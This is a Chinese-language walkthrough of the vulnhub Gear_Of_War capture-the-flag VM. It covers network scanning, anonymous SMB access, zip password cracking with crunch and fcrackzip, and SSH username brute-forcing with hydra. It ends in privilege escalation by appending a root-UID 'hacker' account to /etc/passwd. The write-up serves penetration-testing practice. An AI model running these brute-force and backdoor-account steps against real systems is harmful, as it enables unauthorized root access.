本周末实践的是vulnhub的Gear_Of_War镜像,比较简单,
下载地址,https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova,
用workstation导入出错,改用virtualbox导入成功,
老规矩,先做地址扫描,
sudo netdiscover -r 192.168.56.0/24,
按照经验,192.168.56.101应该就是靶机,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.101,
有smb服务,直接试试匿名登录,
sudo smbclient -L 192.168.56.101,
并查看共享文件,
sudo smbclient //192.168.56.101/LOCUS_LAN$,
把共享的文件下载下来,
解压文件发现需要密码,在文本文件里看到了密码格式的提示,
用crunsh生成密码字典,sudo crunch 4 4 -t @%%, -o password,
再用fcrackzip破解得到密码r44M,
sudo fcrackzip -D -u -v -p password msg_horda.zip,
这回就能解压文件了,从解压出来的文件里看到一个密码提示,3_d4y,
需要自己再找用户名,那就爆破ssh的用户名,
sudo hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y 192.168.56.101 ssh,得到用户名marcus,
用marcus/3_d4y登录ssh,不是root,需要提权,
find /bin -type f -perm -u=s 2>/dev/null,
查找root权限的命令发现有命令行输出限制,
重新带参数ssh登录,再重新查找root权限的命令就有输出了,
ssh [email protected] -t "bash --noprofile",
发下cp命令和su命令都可用,这就好办了,老套路,直接整passwd文件,
先把/etc/passwd拷贝出来,
cat /etc/passwd > /tmp/passwd,
在kali攻击机上生成要添加的账户密码,
sudo openssl passwd -1 -salt hacker password,
把新创建的账户添加进拷贝出来的passwd文件,
echo 'hacker:$1$hacker$9MeWOdvz78rHYG01HSLfr/:0:0:root:/root:/bin/bash' >> /tmp/passwd,
最后再把新做的passwd文件拷贝回到/etc/passwd,
cp /tmp/passwd /etc/passwd,
这就能直接切到hacker用户了,id看一下是root,搞定,
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Gear_Of_War的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论